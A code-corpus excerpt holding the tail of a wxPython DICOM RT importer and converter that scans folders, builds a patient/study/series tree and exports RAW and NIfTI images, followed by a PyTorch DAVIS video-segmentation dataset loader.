f.write('{} {}\r'.format(field,conv_kernel))
elif 'ModelName' in field:
f.write('{} {}\r'.format(field,model_name))
elif 'PatientPosition' in field:
f.write('{} {}\r'.format(field,pat_pos))
elif 'PatientOrientation' in field:
f.write('{} {}\r'.format(field,pat_ori))
elif 'ImageOrientation' in field:
f.write('{} {}\r'.format(field,img_ori.tolist()))
elif 'StudyDate' in field:
f.write('{} {}\r'.format(field,study_date))
elif 'SeriesDate' in field:
f.write('{} {}\r'.format(field,serise_date))
elif 'AcquisitionDate' in field:
f.write('{} {}\r'.format(field,acq_date))
elif 'Orientation' in field:
f.write('{} {}\r'.format(field,'LPF'))
elif '' == field:
pass
else:
f.write('{} \r'.format(field))
wx.CallAfter(progressFunc, 97, 100, 'Export RAW image completed')
if self.export_nii_format:
import nibabel as nib
logger.info('Exporting image to %s', nii_fname)
nib.save(nib.Nifti1Image(image_array, affine=affine), nii_fname)
wx.CallAfter(progressFunc, 98, 100, 'Export Nifti image completed')
def OnConvert(self, evt):
if not self.selected_exports:
self.AlertDialog('No Dicom series have been selected!')
return
if not self.output_dir:
self.AlertDialog('Please enter valid output dir!')
return
if not self.output_name:
self.AlertDialog('Please enter valid output file name!')
return
if not os.path.isdir(self.output_dir):
logger.info("Output dir not exists! Create new dir [%s]", self.output_dir)
os.makedirs(self.output_dir)
all_export_threads = []
for export in self.selected_exports:
info = self.tcPatients.GetItemData(export)
filearray, series_no = info['filearray'], info['info']['series_number']
basename = os.path.join(self.output_dir, self.output_name+'-'+str(series_no)+'.512')
all_export_threads.append(threading.Thread(target=self.ExportPatientData,
args=(self.path, filearray, self.txtRxDose.GetValue(),
self.SetThreadStatus, self.OnUpdateProgress,
functools.partial(self.ExportFunc, out_basepath=basename))))
[th.start() for th in all_export_threads]
#[th.join() for th in all_export_threads] # wait all threads
#self.AlertDialog('All exports finished!')
def OnCheckSearchSubfolders(self, evt):
"""Determine whether to search subfolders for DICOM data."""
self.import_search_subfolders = evt.IsChecked()
self.terminate = True
self.OnDirectorySearch()
def OnBrowseDicomImport(self, evt):
"""Get the directory selected by the user."""
self.terminate = True
dlg = wx.DirDialog(
self, defaultPath = self.path,
message="Choose a directory containing DICOM RT files...")
if dlg.ShowModal() == wx.ID_OK:
self.path = dlg.GetPath()
self.txtDicomImport.SetValue(self.path)
dlg.Destroy()
#self.OnDirectorySearch()
def OnDirectorySearch(self):
"""Begin directory search."""
self.patients = {}
self.tcPatients.DeleteChildren(self.root)
self.terminate = False
self.gaugeProgress.Show(True)
self.lblProgressPercent.Show(True)
self.lblProgressPercentSym.Show(True)
#self.btnSelect.Enable(False)
# Disable Rx dose controls except on GTK due to control placement oddities
if not guiutil.IsGtk():
self.EnableRxDose(False)
# If a previous search thread exists, block until it is done before
# starting a new thread
if (hasattr(self, 't')):
self.t.join()
del self.t
self.t=threading.Thread(target=self.DirectorySearchThread,
args=(self, self.path, self.import_search_subfolders,
self.SetThreadStatus, self.OnUpdateProgress,
self.AddPatientTree, self.AddPatientDataTree))
self.t.start()
def SetThreadStatus(self):
"""Tell the directory search thread whether to terminate or not."""
return self.terminate
def DirectorySearchThread(self, parent, path, subfolders, terminate,
progressFunc, foundFunc, resultFunc):
"""Thread to start the directory search."""
# Call the progress function to update the gui
wx.CallAfter(progressFunc, 0, 0, 'Searching for patients...')
patients = {}
# Check if the path is valid
if os.path.isdir(path):
files = []
for root, dirs, filenames in os.walk(path):
files += map(lambda f:os.path.join(root, f), filenames)
if (self.import_search_subfolders == False):
break
for n in range(len(files)):
# terminate the thread if the value has changed
# during the loop duration
if terminate():
wx.CallAfter(progressFunc, 0, 0, 'Search terminated.')
return
if (os.path.isfile(files[n])):
try:
logger.debug("Reading: %s", files[n])
dp = dicomparser.DicomParser(files[n])
except (AttributeError, EOFError, IOError, KeyError):
pass
logger.info("%s is not a valid DICOM file.", files[n])
else:
patient = dp.GetDemographics()
h = hashlib.sha1(patient['id'].encode('utf-8')).hexdigest()
if not h in patients:
patients[h] = {}
patients[h]['demographics'] = patient
if not 'studies' in patients[h]:
patients[h]['studies'] = {}
patients[h]['series'] = {}
wx.CallAfter(foundFunc, patient)
# Create each Study but don't create one for RT Dose
# since some vendors use incorrect StudyInstanceUIDs
if not (dp.GetSOPClassUID() == 'rtdose'):
stinfo = dp.GetStudyInfo()
if not stinfo['id'] in patients[h]['studies']:
patients[h]['studies'][stinfo['id']] = stinfo
# Create each Series of images
if (('ImageOrientationPatient' in dp.ds) and \
not (dp.GetSOPClassUID() == 'rtdose')):
seinfo = dp.GetSeriesInfo()
try:
seinfo['series_number'] = dp.ds.SeriesNumber #added by CL.Wang
seinfo['KVP'] = dp.ds.KVP
seinfo['PatientPosition'] = dp.ds.PatientPosition
seinfo['ModelName'] = dp.ds.ManufacturerModelName
seinfo['PixelSpacing'] = dp.ds.PixelSpacing
seinfo['Orientation'] = dp.ds.ImageOrientationPatient
except:
logger.error('Get dcm info error!')
seinfo['numimages'] = 0
seinfo['modality'] = dp.ds.SOPClassUID.name
if not seinfo['id'] in patients[h]['series']:
patients[h]['series'][seinfo['id']] = seinfo
if not 'images' in patients[h]:
patients[h]['images'] = {}
image = {}
image['id'] = dp.GetSOPInstanceUID()
image['filename'] = files[n]
image['series'] = seinfo['id']
image['referenceframe'] = dp.GetFrameOfReferenceUID()
patients[h]['series'][seinfo['id']]['numimages'] = \
patients[h]['series'][seinfo['id']]['numimages'] + 1
patients[h]['images'][image['id']] = image
# Create each RT Structure Set
elif dp.ds.Modality in ['RTSTRUCT']:
if not 'structures' in patients[h]:
patients[h]['structures'] = {}
structure = dp.GetStructureInfo()
structure['id'] = dp.GetSOPInstanceUID()
structure['filename'] = files[n]
structure['series'] = dp.GetReferencedSeries()
structure['referenceframe'] = dp.GetFrameOfReferenceUID()
patients[h]['structures'][structure['id']] = structure
# Create each RT Plan
elif dp.ds.Modality in ['RTPLAN']:
if not 'plans' in patients[h]:
patients[h]['plans'] = {}
plan = dp.GetPlan()
plan['id'] = dp.GetSOPInstanceUID()
plan['filename'] = files[n]
plan['series'] = dp.ds.SeriesInstanceUID
plan['referenceframe'] = dp.GetFrameOfReferenceUID()
plan['beams'] = dp.GetReferencedBeamsInFraction()
plan['rtss'] = dp.GetReferencedStructureSet()
patients[h]['plans'][plan['id']] = plan
# Create each RT Dose
elif dp.ds.Modality in ['RTDOSE']:
if not 'doses' in patients[h]:
patients[h]['doses'] = {}
dose = {}
dose['id'] = dp.GetSOPInstanceUID()
dose['filename'] = files[n]
dose['referenceframe'] = dp.GetFrameOfReferenceUID()
dose['hasdvh'] = dp.HasDVHs()
dose['hasgrid'] = "PixelData" in dp.ds
dose['summationtype'] = dp.ds.DoseSummationType
dose['beam'] = dp.GetReferencedBeamNumber()
dose['rtss'] = dp.GetReferencedStructureSet()
dose['rtplan'] = dp.GetReferencedRTPlan()
patients[h]['doses'][dose['id']] = dose
# Otherwise it is a currently unsupported file
else:
logger.info("%s is a %s file and is not " + \
"currently supported.",
files[n], dp.ds.SOPClassUID.name)
# Call the progress function to update the gui
wx.CallAfter(progressFunc, n, len(files), 'Searching for patients...')
if (len(patients) == 0):
progressStr = 'Found 0 patients.'
elif (len(patients) == 1):
progressStr = 'Found 1 patient. Reading DICOM data...'
elif (len(patients) > 1):
progressStr = 'Found ' + str(len(patients)) + ' patients. Reading DICOM data...'
wx.CallAfter(progressFunc, 0, 1, progressStr)
wx.CallAfter(resultFunc, patients)
# if the path is not valid, display an error message
else:
wx.CallAfter(progressFunc, 0, 0, 'Select a valid location.')
dlg = wx.MessageDialog(
parent,
"The DICOM import location does not exist. Please select a valid location.",
"Invalid DICOM Import Location", wx.OK|wx.ICON_ERROR)
dlg.ShowModal()
def OnUpdateProgress(self, num, length, message):
"""Update the DICOM Import process interface elements."""
if not length:
percentDone = 0
else:
percentDone = int(100 * (num+1) / length)
self.gaugeProgress.SetValue(percentDone)
self.lblProgressPercent.SetLabel(str(percentDone))
self.lblProgress.SetLabel(message)
if not (percentDone == 100):
self.gaugeProgress.Show(True)
self.lblProgressPercent.Show(True)
self.lblProgressPercentSym.Show(True)
else:
self.gaugeProgress.Show(False)
self.lblProgressPercent.Show(False)
self.lblProgressPercentSym.Show(False)
# End the dialog since we are done with the import process
if (message == 'Importing patient complete.'):
self.EndModal(wx.ID_OK)
elif (message == 'Importing patient cancelled.'):
self.EndModal(wx.ID_CANCEL)
def InitTree(self):
"""Initialize the tree control for use."""
iSize = (16,16)
iList = wx.ImageList(iSize[0], iSize[1])
iList.Add(
wx.Bitmap(
util.GetResourcePath('group.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('user.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('book.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('table_multiple.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('pencil.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('chart_bar.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('chart_curve.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('pencil_error.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('chart_bar_error.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('chart_curve_error.png'),
wx.BITMAP_TYPE_PNG))
iList.Add(
wx.Bitmap(
util.GetResourcePath('table_selected.png'),
wx.BITMAP_TYPE_PNG))
self.tcPatients.AssignImageList(iList)
root = self.tcPatients.AddRoot('Patients', image=0)
return root
def AddPatientTree(self, patient):
"""Add a new patient to the tree control."""
# Create a hash for each patient
h = hashlib.sha1(patient['id'].encode('utf-8')).hexdigest()
# Add the patient to the tree if they don't already exist
if not h in self.patients:
self.patients[h] = {}
self.patients[h]['demographics'] = patient
name = str(patient['name']) + ' (' + patient['id'] + ')'
self.patients[h]['treeid'] = \
self.tcPatients.AppendItem(self.root, name, 1)
self.tcPatients.SortChildren(self.root)
self.tcPatients.ExpandAll()
def AddPatientDataTree(self, patients):
"""Add the patient data to the tree control."""
# Now add the specific item to the tree
for key, patient in self.patients.items():
patient.update(patients[key])
if 'studies' in patient:
for studyid, study in patient['studies'].items():
name = 'Study: ' + study['description']
study['treeid'] = self.tcPatients.AppendItem(patient['treeid'], name, 2)
# Search for series and images
if 'series' in patient:
for seriesid, series in patient['series'].items():
if 'studies' in patient:
for studyid, study in patient['studies'].items():
if (studyid == series['study']):
modality = series['modality'].partition(' Image Storage')[0]
name = 'Series {}: {}. ({}, {} {})'.format(series['series_number'], series['description'], modality, series['numimages'], 'image' if series['numimages']==1 else 'images')
#name = 'Series: ' + series['description'] + ' (' + modality + ', '
#numimages = str(series['numimages']) + ' image)' if (series['numimages'] == 1) else str(series['numimages']) + ' images)'
#name = name + numimages
series['treeid'] = self.tcPatients.AppendItem(study['treeid'], name, 3)
self.EnableItemSelection(patient, series, [])
# Search for RT Structure Sets
if 'structures' in patient:
for structureid, structure in patient['structures'].items():
if 'series' in patient:
foundseries = False
name = 'RT Structure Set: ' + structure['label']
for seriesid, series in patient['series'].items():
foundseries = False
if (seriesid == structure['series']):
structure['treeid'] = self.tcPatients.AppendItem(series['treeid'], name, 4)
foundseries = True
# If no series were found, add the rtss to the study
if not foundseries:
structure['treeid'] = self.tcPatients.AppendItem(study['treeid'], name, 4)
filearray = [structure['filename']]
self.EnableItemSelection(patient, structure, filearray)
# Search for RT Plans
if 'plans' in patient:
for planid, plan in patient['plans'].items():
foundstructure = False
planname = ' (' + plan['name'] + ')' if len(plan['name']) else ""
rxdose = plan['rxdose'] if plan['rxdose'] > 0 else "Unknown"
name = 'RT Plan: ' + plan['label'] + planname + \
' - Dose: ' + str(rxdose) + ' cGy'
if 'structures' in patient:
for structureid, structure in patient['structures'].items():
foundstructure = False
if (structureid == plan['rtss']):
plan['treeid'] = self.tcPatients.AppendItem(structure['treeid'], name, 5)
foundstructure = True
# If no structures were found, add the plan to the study/series instead
if not foundstructure:
# If there is an image series, add a fake rtss to it
foundseries = False
for seriesid, series in patient['series'].items():
foundseries = False
if (series['referenceframe'] == plan['referenceframe']):
badstructure = self.tcPatients.AppendItem(
series['treeid'], "RT Structure Set not found", 7)
foundseries = True
# If no series were found, add the rtss to the study
if not foundseries:
badstructure = self.tcPatients.AppendItem(
patient['treeid'], "RT Structure Set not found", 7)
plan['treeid'] = self.tcPatients.AppendItem(badstructure, name, 5)
self.tcPatients.SetItemTextColour(badstructure, wx.RED)
filearray = [plan['filename']]
self.EnableItemSelection(patient, plan, filearray, plan['rxdose'])
# Search for RT Doses
if 'doses' in patient:
for doseid, dose in patient['doses'].items():
foundplan = False
if 'plans' in patient:
for planid, plan in patient['plans'].items():
foundplan = False
if (planid == dose['rtplan']):
foundplan = True
rxdose = None
if dose['hasgrid']:
if dose['hasdvh']:
name = 'RT Dose with DVH'
else:
name = 'RT Dose without DVH'
else:
if dose['hasdvh']:
name = 'RT Dose without Dose Grid (DVH only)'
else:
name = 'RT Dose without Dose Grid or DVH'
if (dose['summationtype'] == "BEAM"):
name += " (Beam " + str(dose['beam']) + ": "
if dose['beam'] in plan['beams']:
b = plan['beams'][dose['beam']]
name += b['name']
if len(b['description']):
name += " - " + b['description']
name += ")"
if "dose" in b:
name += " - Dose: " + str(int(b['dose'])) + " cGy"
rxdose = int(b['dose'])
dose['treeid'] = self.tcPatients.AppendItem(plan['treeid'], name, 6)
filearray = [dose['filename']]
self.EnableItemSelection(patient, dose, filearray, rxdose)
# If no plans were found, add the dose to the structure/study instead
if not foundplan:
if dose['hasgrid']:
if dose['hasdvh']:
name = 'RT Dose with DVH'
else:
name = 'RT Dose without DVH'
else:
if dose['hasdvh']:
name = 'RT Dose without Dose Grid (DVH only)'
else:
name = 'RT Dose without Dose Grid or DVH'
foundstructure = False
if 'structures' in patient:
for structureid, structure in patient['structures'].items():
foundstructure = False
if 'rtss' in dose:
if (structureid == dose['rtss']):
foundstructure = True
if (structure['referenceframe'] == dose['referenceframe']):
foundstructure = True
if foundstructure:
badplan = self.tcPatients.AppendItem(
structure['treeid'], "RT Plan not found", 8)
dose['treeid'] = self.tcPatients.AppendItem(badplan, name, 6)
self.tcPatients.SetItemTextColour(badplan, wx.RED)
filearray = [dose['filename']]
self.EnableItemSelection(patient, dose, filearray)
if not foundstructure:
# If there is an image series, add a fake rtss to it
foundseries = False
for seriesid, series in patient['series'].items():
foundseries = False
if (series['referenceframe'] == dose['referenceframe']):
badstructure = self.tcPatients.AppendItem(
series['treeid'], "RT Structure Set not found", 7)
foundseries = True
# If no series were found, add the rtss to the study
if not foundseries:
badstructure = self.tcPatients.AppendItem(
patient['treeid'], "RT Structure Set not found", 7)
self.tcPatients.SetItemTextColour(badstructure, wx.RED)
badplan = self.tcPatients.AppendItem(
badstructure, "RT Plan not found", 8)
dose['treeid'] = self.tcPatients.AppendItem(badplan, name, 5)
self.tcPatients.SetItemTextColour(badplan, wx.RED)
filearray = [dose['filename']]
self.EnableItemSelection(patient, dose, filearray)
# No RT Dose files were found
else:
if 'structures' in patient:
for structureid, structure in patient['structures'].items():
if 'plans' in patient:
for planid, plan in patient['plans'].items():
name = 'RT Dose not found'
baddose = self.tcPatients.AppendItem(plan['treeid'], name, 9)
self.tcPatients.SetItemTextColour(baddose, wx.RED)
# No RT Plan nor RT Dose files were found
else:
name = 'RT Plan not found'
badplan = self.tcPatients.AppendItem(structure['treeid'], name, 8)
self.tcPatients.SetItemTextColour(badplan, wx.RED)
name = 'RT Dose not found'
baddose = self.tcPatients.AppendItem(badplan, name, 9)
self.tcPatients.SetItemTextColour(baddose, wx.RED)
#self.btnSelect.SetFocus()
self.tcPatients.ExpandAll()
self.lblProgress.SetLabel(
str(self.lblProgress.GetLabel()).replace(' Reading DICOM data...', ''))
#Added by CL.Wang
self.Check_Export_Files()
def Check_Export_Files(self):
def select(child, flag):
if flag:
self.tcPatients.SetItemImage(child, 10)
self.selected_exports.append(child)
else:
self.tcPatients.SetItemImage(child, 3)
def minslice_check(child):
info = self.tcPatients.GetItemData(child)['info']
return int(info['numimages'])>self.min_slice_num
self.selected_exports = []
first_patient = self.tcPatients.GetFirstChild(self.tcPatients.RootItem)[0]
first_study = self.tcPatients.GetFirstChild(first_patient)[0]
child, cookie = self.tcPatients.GetFirstChild(first_study)
while child.IsOk():
if self.only_export_voldata:
title = self.tcPatients.GetItemText(child)
flag = 'vol' in title.lower() and minslice_check(child)
select(child, flag)
else:
select(child, minslice_check(child))
child, cookie = self.tcPatients.GetNextChild(child, cookie)
logger.info('%d files selected!', len(self.selected_exports))
def EnableItemSelection(self, patient, item, filearray = [], rxdose = None):
"""Enable an item to be selected in the tree control."""
# Add the respective images to the filearray if they exist
if 'images' in patient:
for imageid, image in patient['images'].items():
appendImage = False
# used for image series
if 'id' in item:
if (item['id'] == image['series']):
appendImage = True
# used for RT structure set
if 'series' in item:
if (item['series'] == image['series']):
appendImage = True
# used for RT plan / dose
if 'referenceframe' in item:
if (item['referenceframe'] == image['referenceframe']):
if not 'numimages' in item:
appendImage = True
if appendImage:
filearray.append(image['filename'])
# Add the respective rtss files to the filearray if they exist
if 'structures' in patient:
for structureid, structure in patient['structures'].items():
if 'rtss' in item:
if (structureid == item['rtss']):
filearray.append(structure['filename'])
break
elif (structure['referenceframe'] == item['referenceframe']):
filearray.append(structure['filename'])
break
# If no referenced rtss, but ref'd rtplan, check rtplan->rtss
if 'rtplan' in item:
if 'plans' in patient:
for planid, plan in patient['plans'].items():
if (planid == item['rtplan']):
if 'rtss' in plan:
if (structureid == plan['rtss']):
filearray.append(structure['filename'])
# Add the respective rtplan files to the filearray if they exist
if 'plans' in patient:
for planid, plan in patient['plans'].items():
if 'rtplan' in item:
if (planid == item['rtplan']):
filearray.append(plan['filename'])
if not rxdose:
self.tcPatients.SetItemData(item['treeid'], {'filearray':filearray, 'info':item})
else:
self.tcPatients.SetItemData(item['treeid'], {'filearray':filearray, 'info':item, 'rxdose':rxdose})
self.tcPatients.SetItemBold(item['treeid'], True)
self.tcPatients.SelectItem(item['treeid'])
def OnSelectTreeItem(self, evt):
"""Update the interface when the selected item has changed."""
item = evt.GetItem()
# Disable the rx dose message and select button by default
self.EnableRxDose(False)
#self.btnSelect.Enable(False)
# If the item has data, check to see whether there is an rxdose
if not (self.tcPatients.GetItemData(item) == None):
data = self.tcPatients.GetItemData(item)
#self.btnSelect.Enable()
rxdose = 0
parent = self.tcPatients.GetItemParent(item)
if 'rxdose' in data:
rxdose = data['rxdose']
else:
parentdata = self.tcPatients.GetItemData(parent)
if not (parentdata == None):
if 'rxdose' in parentdata:
rxdose = parentdata['rxdose']
# Show the rxdose text box if no rxdose was found
# and if it is an RT plan or RT dose file
self.txtRxDose.SetValue(rxdose)
if (self.tcPatients.GetItemText(item).startswith('RT Plan') or
self.tcPatients.GetItemText(parent).startswith('RT Plan')):
self.EnableRxDose(True)
def EnableRxDose(self, value):
"""Show or hide the prescription dose message."""
self.bmpRxDose.Show(value)
self.lblRxDose.Show(value)
self.txtRxDose.Show(value)
self.lblRxDoseUnits.Show(value)
# if set to hide, reset the rx dose
if not value:
self.txtRxDose.SetValue(1)
def ExportPatientData(self, path, filearray, RxDose, terminate, progressFunc, exportFunc):
"""Get the data of the selected patient from the DICOM importer dialog."""
msgs = ['Scanning patient. Please wait...','Exporting patient cancelled.','Exporting patient...']
wx.CallAfter(progressFunc, -1, 100, msgs[0])
for n in range(0, len(filearray)):
if terminate():
wx.CallAfter(progressFunc, 98, 100, msgs[1])
return
dcmfile = str(os.path.join(self.path, filearray[n]))
dp = dicomparser.DicomParser(dcmfile)
if (n == 0):
patient = {}
patient['rxdose'] = RxDose
if (('ImageOrientationPatient' in dp.ds) and \
not (dp.GetSOPClassUID() == 'rtdose')):
if not 'images' in patient:
patient['images'] = []
patient['images'].append(dp.ds)
elif (dp.ds.Modality in ['RTSTRUCT']):
patient['rtss'] = dp.ds
elif (dp.ds.Modality in ['RTPLAN']):
patient['rtplan'] = dp.ds
elif (dp.ds.Modality in ['RTDOSE']):
patient['rtdose'] = dp.ds
wx.CallAfter(progressFunc, n//2, len(filearray), msgs[0])
# Sort the images based on a sort descriptor:
# (ImagePositionPatient, InstanceNumber or AcquisitionNumber)
if 'images' in patient:
sortedimages = []
unsortednums = []
sortednums = []
images = patient['images']
sort = 'IPP'
# Determine if all images in the series are parallel
# by testing for differences in ImageOrientationPatient
parallel = True
for i, item in enumerate(images):
if (i > 0):
iop0 = np.array(item.ImageOrientationPatient)
iop1 = np.array(images[i-1].ImageOrientationPatient)
if (np.any(np.array(np.round(iop0 - iop1), dtype=np.int32))):
parallel = False
break
# Also test ImagePositionPatient, as some series
# use the same patient position for every slice
ipp0 = np.array(item.ImagePositionPatient)
ipp1 = np.array(images[i-1].ImagePositionPatient)
if not (np.any(np.array(np.round(ipp0 - ipp1), dtype=np.int32))):
parallel = False
break
# If the images are parallel, sort by ImagePositionPatient
if parallel:
sort = 'IPP'
else:
# Otherwise sort by Instance Number
if not (images[0].InstanceNumber == \
images[1].InstanceNumber):
sort = 'InstanceNumber'
# Otherwise sort by Acquisition Number
elif not (images[0].AcquisitionNumber == \
images[1].AcquisitionNumber):
sort = 'AcquisitionNumber'
# Add the sort descriptor to a list to be sorted
for i, image in enumerate(images):
if (sort == 'IPP'):
unsortednums.append(image.ImagePositionPatient[2])
else:
unsortednums.append(image.data_element(sort).value)
# Sort in LPI order! Modified by CL.Wang
# Sort image numbers in descending order for head first patients
if ('hf' in image.PatientPosition.lower()) and (sort == 'IPP'):
sortednums = sorted(unsortednums, reverse=True)
# Otherwise sort image numbers in ascending order
else:
sortednums = sorted(unsortednums, reverse=False)
# Add the images to the array based on the sorted order
for s, slice in enumerate(sortednums):
for i, image in enumerate(images):
if (sort == 'IPP'):
if (slice == image.ImagePositionPatient[2]):
sortedimages.append(image)
elif (slice == image.data_element(sort).value):
sortedimages.append(image)
# Save the images back to the patient dictionary
logger.debug('Slices num: %d', len(sortedimages))
patient['images'] = sortedimages
wx.CallAfter(progressFunc, 49, 100, msgs[2])
if exportFunc:
exportFunc(patient_data=patient, progressFunc=progressFunc)
wx.CallAfter(progressFunc, 99, 100, '')
def GetPatient(self):
"""Return the patient data from the DICOM importer dialog."""
return self.patient
def OnCancel(self, evt):
"""Stop the directory search and close the dialog."""
self.terminate = True
super().OnCancel(evt)
def main():
app = DcmConverterApp(0)
app.MainLoop()
if __name__ == '__main__':
main()
| 2.390625 | 2 |
datasets/davis.py | sallymmx/TransVOS | 20 | 12797966 | <reponame>sallymmx/TransVOS
import os
import numpy as np
from glob import glob
import random
import torch
from torch.utils import data
import torchvision.transforms as TF
import datasets.transform as mytrans
from utils.system import load_image_in_PIL, gct
import matplotlib.pyplot as plt
from PIL import Image
from datasets.data_utils import multibatch_collate_fn, convert_one_hot
class DAVIS_Train(data.Dataset):
r'''
- root: data root path, str
- output_size: output size of image and mask, tuple
- imset
- clip_n: number of video clip for training, int
- max_obj_n: maximum number of objects in a image for training, int
'''
MAX_TRAINING_SKIP = 100
def __init__(self, root, output_size, imset='2017/train.txt', clip_n=3, max_obj_n=7,
max_skip=5, increment=5, samples=2, choice='order', crop=False):
self.root = root
self.clip_n = clip_n
self.output_size = output_size
self.max_obj_n = max_obj_n
self.max_skip = max_skip
self.increment = increment
self.smaples = samples
self.sample_choice = choice
self.crop = crop
dataset_path = os.path.join(root, 'ImageSets', imset)
self.dataset_list = list()
with open(os.path.join(dataset_path), 'r') as lines:
for line in lines:
dataset_name = line.strip()
if len(dataset_name) > 0:
self.dataset_list.append(dataset_name)
print(f'\t"DAVIS17": {len(self.dataset_list)} videos.')
self.random_horizontal_flip = mytrans.RandomHorizontalFlip(0.3)
self.color_jitter = TF.ColorJitter(0.1, 0.1, 0.1, 0.02)
self.random_affine = mytrans.RandomAffine(degrees=15, translate=(0.1, 0.1), scale=(0.95, 1.05), shear=10)
if self.crop:
self.random_resize_crop = mytrans.RandomResizedCrop(400, (0.8, 1), (0.95, 1.05))
else:
self.resize = mytrans.Resize(output_size)
self.to_tensor = TF.ToTensor()
self.normalize = TF.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
self.to_onehot = mytrans.ToOnehot(max_obj_n, shuffle=True)
def increase_max_skip(self):
self.max_skip = min(self.max_skip + self.increment, self.MAX_TRAINING_SKIP)
def set_max_skip(self, max_skip):
self.max_skip = max_skip
def __len__(self):
return len(self.dataset_list) * self.smaples
def __getitem__(self, idx):
video_name = self.dataset_list[idx//self.smaples]
img_dir = os.path.join(self.root, 'JPEGImages', '480p', video_name)
mask_dir = os.path.join(self.root, 'Annotations', '480p', video_name)
img_list = sorted(glob(os.path.join(img_dir, '*.jpg')))
mask_list = sorted(glob(os.path.join(mask_dir, '*.png')))
img_n = len(img_list)
obj_n = 1
while obj_n == 1:
if self.sample_choice == 'order':
idx_list = list()
last_sample = -1
sample_n = min(self.clip_n, img_n)
for i in range(sample_n):
if i == 0:
last_sample = random.choice(range(0, img_n-sample_n+1))
else:
last_sample = random.choice(
range(last_sample+1, min(last_sample+self.max_skip+1, img_n-sample_n+i+1)))
idx_list.append(last_sample)
elif self.sample_choice == 'random':
idx_list = list(range(img_n))
random.shuffle(idx_list)
sample_n = min(self.clip_n, img_n)
idx_list = idx_list[:sample_n]
else:
raise NotImplementedError()
while len(idx_list) < self.clip_n: # short video
idx_list.append(idx_list[-1])
if not self.crop:
frames = torch.zeros((self.clip_n, 3, *self.output_size), dtype=torch.float)
masks = torch.zeros((self.clip_n, self.max_obj_n, *self.output_size), dtype=torch.float)
else:
frames = torch.zeros((self.clip_n, 3, 400, 400), dtype=torch.float)
masks = torch.zeros((self.clip_n, self.max_obj_n, 400, 400), dtype=torch.float)
for i, frame_idx in enumerate(idx_list):
img = load_image_in_PIL(img_list[frame_idx], 'RGB')
mask = load_image_in_PIL(mask_list[frame_idx], 'P')
if i > 0:
img = self.color_jitter(img)
img, mask = self.random_affine(img, mask)
if self.crop:
img, mask = self.random_resize_crop(img, mask)
else:
img, mask = self.resize(img, mask)
mask = np.array(mask, np.uint8)
if i == 0:
mask, obj_list = self.to_onehot(mask)
obj_n = len(obj_list) + 1
else:
mask, _ = self.to_onehot(mask, obj_list)
frames[i] = self.normalize(self.to_tensor(img))
masks[i] = mask
info = {
'name': video_name,
'idx_list': idx_list
}
return frames, masks, obj_n, info
class DAVIS_Test(data.Dataset):
r'''
- root: data root path, str
- output_size: output size of image and mask, tuple
- imset
- max_obj_n: maximum number of objects in a image for training, int
'''
def __init__(self, root, output_size=None, img_set='2017/val.txt', max_obj_n=11, single_obj=False):
self.root = root
self.single_obj = single_obj
dataset_path = os.path.join(root, 'ImageSets', img_set)
self.dataset_list = list()
self.output_size = output_size
with open(os.path.join(dataset_path), 'r') as lines:
for line in lines:
dataset_name = line.strip()
if len(dataset_name) > 0:
self.dataset_list.append(dataset_name)
self.to_tensor = TF.ToTensor()
self.normalize = TF.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
self.to_onehot = mytrans.ToOnehot(max_obj_n, shuffle=False)
def __len__(self):
return len(self.dataset_list)
def __getitem__(self, idx):
video_name = self.dataset_list[idx]
img_dir = os.path.join(self.root, 'JPEGImages', '480p', video_name)
mask_dir = os.path.join(self.root, 'Annotations', '480p', video_name)
img_list = sorted(glob(os.path.join(img_dir, '*.jpg')))
mask_list = sorted(glob(os.path.join(mask_dir, '*.png')))
first_mask = load_image_in_PIL(mask_list[0], 'P')
original_w, original_h = first_mask.size
if self.output_size:
out_h, out_w = self.output_size
if original_h < out_h:
h, w = original_h, original_w
else:
h = out_h
w = int(original_w / original_h * out_h)
# h = self.out_h
# w = self.out_w
else:
h, w = original_h, original_w
first_mask = first_mask.resize((w, h), Image.NEAREST)
first_mask_np = np.array(first_mask, np.uint8)
if self.single_obj:
first_mask_np[first_mask_np > 1] = 1
obj_n = first_mask_np.max() + 1
video_len = len(img_list)
frames = torch.zeros((video_len, 3, h, w), dtype=torch.float)
masks = torch.zeros((1, obj_n, h, w), dtype=torch.float)
mask, _ = self.to_onehot(first_mask_np)
masks[0] = mask[:obj_n]
for i in range(video_len):
img = load_image_in_PIL(img_list[i], 'RGB')
img = img.resize((w, h), Image.BILINEAR)
frames[i] = self.normalize(self.to_tensor(img))
info = {
'name': video_name,
'num_frames': video_len,
'original_size': (original_h, original_w)
}
return frames, masks, obj_n, info
def build_davis(cfg, train=True):
if train:
return DAVIS_Train(
root=cfg.DATA.DAVIS_ROOT,
output_size=cfg.DATA.SIZE,
clip_n=cfg.DATA.TRAIN.FRAMES_PER_CLIP,
max_obj_n=cfg.DATA.TRAIN.MAX_OBJECTS,
max_skip=cfg.DATA.TRAIN.DAVIS_SKIP_INCREMENT[0],
increment=cfg.DATA.TRAIN.DAVIS_SKIP_INCREMENT[1],
samples=cfg.DATA.TRAIN.SAMPLES_PER_VIDEO,
choice=cfg.DATA.TRAIN.SAMPLE_CHOICE,
crop=cfg.DATA.TRAIN.CROP
)
else:
single_obj = (cfg.DATA.VAL.DATASET_NAME == 'DAVIS16')
return DAVIS_Test(
root=cfg.DATA.DAVIS_ROOT,
single_obj=single_obj
)
if __name__ == '__main__':
ds = DAVIS_Train('/public/datasets/DAVIS', output_size=(240, 427), max_obj_n=6)
trainloader = data.DataLoader(ds, batch_size=1, shuffle=True, num_workers=1,
collate_fn=multibatch_collate_fn, drop_last=True)
i, data = next(enumerate(trainloader))
